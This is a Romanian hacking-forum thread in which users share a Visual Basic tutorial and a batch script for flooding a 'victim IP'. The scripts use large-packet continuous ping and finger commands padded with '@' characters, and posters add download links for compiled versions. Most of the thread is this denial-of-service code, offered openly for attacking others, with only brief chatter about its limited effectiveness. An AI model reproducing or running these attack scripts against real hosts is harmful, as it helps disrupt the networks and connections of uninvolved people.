Sub_Zero Posted September 15, 2006 Report Posted September 15, 2006 Ok start off by making a new exe and stick on there 2 command buttons, text box a label and watever really - they are the neccessary ones, u dont need the label if u dont want it. Ok name the command buttons cmdFinger and cmdPing, the text field to txtIP and the label to lblStatus and give them suitable captions.now for the coding. Private Sub cmdPing_Click() 'this tells it what to give the instructions toMsgBox "Launching Attack", vbInformation, "Launching Attack" 'This is a little pop-upShell ("ping " & txtIP.Text & " -l 65500 -t") ' "shell tells it to open DOS then type this in automaticallylblstatus.Caption = "Pinging IP" 'Changes the Label captionEnd SubPrivate Sub cmdFinger_Click()MsgBox "Launching Attack", vbInformation, "Launching attack"Shell ("finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" & txtIP.Text)lblstatus.Caption = "Finger IP"End SubAnd thats about it, compile it and ur done. Quote
Icarius Posted September 15, 2006 Report Posted September 15, 2006 e f bun acest tutorial. dar ar fi trebui totusi postat la "Programare".. Quote
Sub_Zero Posted September 16, 2006 Author Report Posted September 16, 2006 pai daca Kw3[R]Ln o sa se uite pe acest post el va decide daca o sa fie mutat sau nu Quote
Sub_Zero Posted September 16, 2006 Author Report Posted September 16, 2006 mersi ca l-ai mutat,apropo iti place? Quote
Ras Posted November 9, 2006 Report Posted November 9, 2006 nu merge....pun ip-ul dau ddos si nu se deschide in cmd.... Quote
Zeus Posted November 9, 2006 Report Posted November 9, 2006 Ras wrote: nu merge....pun ip-ul dau ddos si nu se deschide in cmd.... ...ei nu......am pus eu programul aici...asa simplu cum ii el...dar merge...acum nu stiu cat de eficient ii [url]http://share.urbanfriends.us/uploads/9eb50eb1a5.rar[/url] Quote
virusz Posted November 10, 2006 Report Posted November 10, 2006 lol...pai dak e vorba ef eficacitate, nush ce sa mai zic ...tre sa ai net blana si victima sa fie pe dialup F|_|ck1(finger) face: ping ip -l 65500 -tF|_|ck2(ping) face: finger @@@@@@@@@@@@@@@@@@@... IPin fine...uite aci tot asta dar pentru consola @echo offcolor atitle DDos Attack - RST:mnu@echo DDos Attack - RST@echo -----------------@echo.@echo 1= Finger Attack@echo 2= Ping Attack@echo 3= Quit!@echo.set /p c=Choose Attack Level:if "%C%"=="1" goto fingaif "%C%"=="2" goto pingaif "%C%"=="3" exit:pingaclsset /p ip=Enter Victim IP: @echo to stop attack press Ctrl+C@echo Starting Attack...ping %ip% -l 65500 -tgoto mnu:fingaclsset /p ip=Enter Victim IP: @echo Starting Attack...finger @@@@@@@@@@@@..puneti voi mai multi, urmati de %ip%goto mnuScriprul de mai sus. pus intr-un exe!Download: http://share.urbanfriends.us/uploads/a7fd97e8db.rar Quote
Zeus Posted November 10, 2006 Report Posted November 10, 2006 virusz wrote: lol...pai dak e vorba ef eficacitate, nush ce sa mai zic ...tre sa ai net blana si victima sa fie pe dialup ...ce direct ejti...io am ziso mai elegant ......oricum indiferent de metoda nu se merita...trebuie sa ai motive foarte intemeiate sa te apuci sa il kilaresti pe unul...sau sa iti placa,asta ii altceva. Quote